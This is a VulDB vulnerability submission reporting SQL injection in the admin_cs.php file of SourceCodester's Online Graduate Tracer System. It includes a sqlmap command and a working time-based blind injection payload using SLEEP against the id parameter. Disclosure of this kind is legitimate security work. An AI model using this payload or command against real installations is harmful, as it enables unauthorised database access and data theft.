Submit #99590: SourceCodester Online Graduate Tracer System admin_cs.php sql injectioninfo

TitelSourceCodester Online Graduate Tracer System admin_cs.php sql injection
BeschreibungSourceCodester Online Graduate Tracer System admin_cs.php sql injection url:tracking/admin/admin_cs.php Abstract: Line 241 of admin_cs.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: Data enters a program from an untrusted source. The data is used to dynamically construct a SQL query. In this case the data is passed to mysqli_query() in admin_cs.php at line 241. sqlmap.py -u http://127.0.0.1/shenji/tracking/admin/admin_cs.php?id=1111 --current-db Parameter: id (GET) Type: time-based blind Title: MYSQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id:1111'AND (SELECT 5126 FROM (SELECT(SLEEP(5)))BFUF) ANDIgBK':'IgBK Download Code: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html
Quelle⚠️ https://blog.csdn.net/weixin_43864034/article/details/129418770
Benutzer
 bit3hh (UID 42576)
Einreichung09.03.2023 04:54 (vor 3 Jahren)
Moderieren09.03.2023 15:30 (11 hours later)
StatusAkzeptiert
VulDB Eintrag222647 [SourceCodester Online Graduate Tracer System 1.0 admin_cs.php mysqli_query SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!